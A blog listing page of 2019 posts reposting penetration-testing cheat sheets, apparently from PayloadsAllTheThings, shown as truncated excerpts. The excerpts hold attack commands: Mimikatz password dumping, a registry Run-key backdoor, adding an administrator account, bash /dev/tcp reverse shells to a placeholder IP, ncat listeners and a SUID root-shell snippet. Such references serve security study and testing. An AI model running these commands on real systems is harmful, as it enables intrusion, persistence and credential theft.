摘要:
http://repository.root-me.org/Administration/Unix/EN%20-%20Dangers%20of%20SUID%20Shell%20Scripts.pdf 阅读全文
posted @ 2019-02-21 12:05
heycomputer
阅读(96)
评论(0)
推荐(0)
摘要:
Windows - Mimikatz Mimikatz - Execute commands Only one command PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit Mim 阅读全文
posted @ 2019-02-21 11:42
heycomputer
阅读(4734)
评论(0)
推荐(0)
摘要:
Userland Registry Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. Value name: Backdoor Value data: C:\Users\Rasta\AppData 阅读全文
posted @ 2019-02-21 11:41
heycomputer
阅读(190)
评论(0)
推荐(0)
摘要:
Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. Installation git clone https:/ 阅读全文
posted @ 2019-02-21 11:40
heycomputer
阅读(564)
评论(0)
推荐(0)
摘要:
Tools Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock (Deprecated) Sherlock - PowerShell script to quickly find missing softwa 阅读全文
posted @ 2019-02-21 11:39
heycomputer
阅读(2275)
评论(0)
推荐(0)
摘要:
TIP 1 - Create your credential :D net user hacker hacker /add net localgroup administrators hacker /add Some info about your user net user /dom net us 阅读全文
posted @ 2019-02-21 11:38
heycomputer
阅读(1010)
评论(0)
推荐(0)
摘要:
Downloaded files location C:\Users<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\ C:\Users<username>\AppData\Local\Microsoft\Wind 阅读全文
posted @ 2019-02-21 11:35
heycomputer
阅读(341)
评论(0)
推荐(0)
摘要:
Windows netsh Port Forwarding netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectp 阅读全文
posted @ 2019-02-21 11:34
heycomputer
阅读(813)
评论(0)
推荐(0)
摘要:
Netdiscover netdiscover -i eth0 -r 192.168.1.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 20 Captured ARP Req/Rep packets, from 4 ho 阅读全文
posted @ 2019-02-21 11:32
heycomputer
阅读(306)
评论(0)
推荐(0)
摘要:
Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2 阅读全文
posted @ 2019-02-21 11:31
heycomputer
阅读(1161)
评论(0)
推荐(0)
摘要:
Summary Passive Recon Shodan Wayback Machine The Harvester Active Recon Nmap Nmap Script RPCClient Enum4all List all the subdirectories and files Gobu 阅读全文
posted @ 2019-02-21 11:30
heycomputer
阅读(435)
评论(0)
推荐(0)
摘要:
安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall & 阅读全文
posted @ 2019-02-21 11:28
heycomputer
阅读(565)
评论(0)
推荐(0)
摘要:
Tools LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t BeRoot - Privilege Esc 阅读全文
posted @ 2019-02-21 11:26
heycomputer
阅读(505)
评论(0)
推荐(0)
摘要:
Basic reverse shell ncat --udp -lvp 4242 ncat --sctp -lvp 4242 ncat --tcp -lvp 4242 Suid Binary TMPDIR2="/var/tmp" echo 'int main(void){setresuid(0, 0 阅读全文
posted @ 2019-02-21 11:25
heycomputer
阅读(311)
评论(0)
推荐(0)
摘要:
https://github.com/swisskyrepo/PayloadsAllTheThings Methodology and Resources Active Directory Attack.md Linux - Persistence.md Linux - Privilege Esca 阅读全文
posted @ 2019-02-21 11:22
heycomputer
阅读(386)
评论(0)
推荐(0)
摘要:
Summary Tools Most common paths to AD compromise MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) Open Shares GPO - Pivoting with Local 阅读全文
posted @ 2019-02-21 11:20
heycomputer
阅读(1404)
评论(0)
推荐(0)
摘要:
Summary Enumerate all subdomains Subbrute KnockPy GoogleDorks EyeWitness Sublist3r Subfinder Aquatone (Ruby and Go versions) AltDNS MassDNS Nmap Subdo 阅读全文
posted @ 2019-02-21 11:18
heycomputer
阅读(2219)
评论(0)
推荐(0)
浙公网安备 33010602011771号